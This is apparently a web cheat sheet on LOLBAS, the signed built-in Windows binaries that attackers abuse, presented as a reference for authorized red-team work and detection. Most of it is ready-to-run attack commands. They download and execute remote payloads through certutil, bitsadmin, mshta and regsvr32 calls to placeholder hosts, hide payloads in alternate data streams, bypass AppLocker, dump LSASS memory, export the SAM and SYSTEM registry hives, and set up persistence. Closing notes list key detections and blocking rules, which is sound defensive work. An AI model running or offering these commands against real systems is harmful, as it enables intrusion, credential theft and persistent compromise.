← All cheat sheets

LOLBAS

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Interactive tool: LOLBin / GTFOBins Browser

OVERVIEW#

LOLBAS = Living Off The Land Binaries, Scripts and Libraries: signed,
built-in Windows tools abused for download, execution, bypass, or
persistence. Index: lolbas-project.github.io. This is a defensive
detection reference and authorized red-team aide. Categories below
map to real-world TTPs (MITRE ATT&CK).

DOWNLOAD (INGRESS TOOL TRANSFER)#

certutil -urlcache -f http://x/a.exe a.exe    # Classic download
certutil -verifyctl -f http://x/a.exe         # Alt download
bitsadmin /transfer j /download http://x/a a.exe
curl http://x/a.exe -o a.exe                  # curl.exe (built-in)
powershell -c "iwr http://x/a -o a.exe"       # Invoke-WebRequest
findstr /V /L W3AllLov http://x/file          # UNC/URL fetch trick
# Others: esentutl.exe, makecab.exe, replace.exe, expand.exe

EXECUTION (PROXY EXEC)#

rundll32 shell32.dll,Control_RunDLL a.dll     # DLL exec
regsvr32 /s /u /i:http://x/a.sct scrobj.dll   # Squiblydoo (remote sct)
mshta http://x/a.hta                          # HTA exec
mshta vbscript:Close(Execute("..."))          # Inline vbscript
wmic process call create "cmd /c ..."         # WMI exec
msbuild.exe a.csproj                          # Inline C# task exec
installutil /logfile= /U a.dll                # .NET installer abuse
# Others: cmstp.exe, ieexec.exe, pcalua.exe, forfiles.exe

SCRIPT ENGINES#

cscript //nologo a.vbs                        # VBScript
wscript a.js                                  # JScript
powershell -ep bypass -f a.ps1                # PowerShell
powershell -enc <base64>                      # Encoded command

AWL / DEFENSE BYPASS#

# AppLocker / WDAC bypass candidates (signed, often allowed):
InstallUtil.exe, MSBuild.exe, regsvcs.exe, regasm.exe,
presentationhost.exe, dnx.exe, rcsi.exe, wsl.exe
# Alternate data streams to hide payloads:
type payload.exe > legit.txt:hidden.exe
wmic process call create "C:\path\legit.txt:hidden.exe"

CREDENTIAL / DATA ACCESS#

# LSASS dump via signed tools (heavily monitored):
rundll32 comsvcs.dll,MiniDump <lsass-pid> out.dmp full
# Registry hive export:
reg save HKLM\SAM sam.hiv && reg save HKLM\SYSTEM sys.hiv
# Vault / DPAPI: vaultcmd, cmdkey /list

RECON (NATIVE)#

whoami /all                          # Token, groups, privileges
net user /domain                     # Domain users
net group "Domain Admins" /domain    # Group membership
nltest /dclist:corp.lu               # DCs
systeminfo                           # Patch level / OS
tasklist /svc                        # Processes + services
wmic qfe list                        # Hotfixes installed

PERSISTENCE (NATIVE)#

schtasks /create /tn t /tr "cmd /c ..." /sc onlogon
reg add HKCU\...\Run /v x /d "cmd /c ..."     # Run key
# WMI event subscription (fileless persistence) via wmic/PowerShell
# Service creation: sc create svc binPath= "..."

EXAMPLES#

# Download + fileless exec chain (blue-team detection target)
certutil -urlcache -f http://10.10.10.5/a.exe %TEMP%\a.exe
rundll32 %TEMP%\a.exe,EntryPoint

# Squiblydoo remote scriptlet execution
regsvr32 /s /n /u /i:http://10.10.10.5/x.sct scrobj.dll

# LSASS minidump with a signed OS DLL (expect EDR alert)
rundll32 comsvcs.dll,MiniDump 660 C:\temp\l.dmp full

NOTES#

- LOLBAS abuse is prized because binaries are Microsoft-signed and
  often allowlisted - detection must be behavioral, not signature
- Highest-value detections: certutil URL fetch, regsvr32 scrobj +
  network, rundll32 comsvcs MiniDump, mshta/wscript spawning children
- WDAC/AppLocker in enforce mode + Microsoft's recommended block
  rules kills most of these paths
- comsvcs MiniDump against lsass is a top EDR trigger; use for
  detection-engineering test cases, not stealth
- Cross-reference with EDR-EVASION.txt and DEFENDER-KQL.txt
- For FS clients, this drives application-control + Sysmon coverage
  gaps in a DORA/NIS2 hardening assessment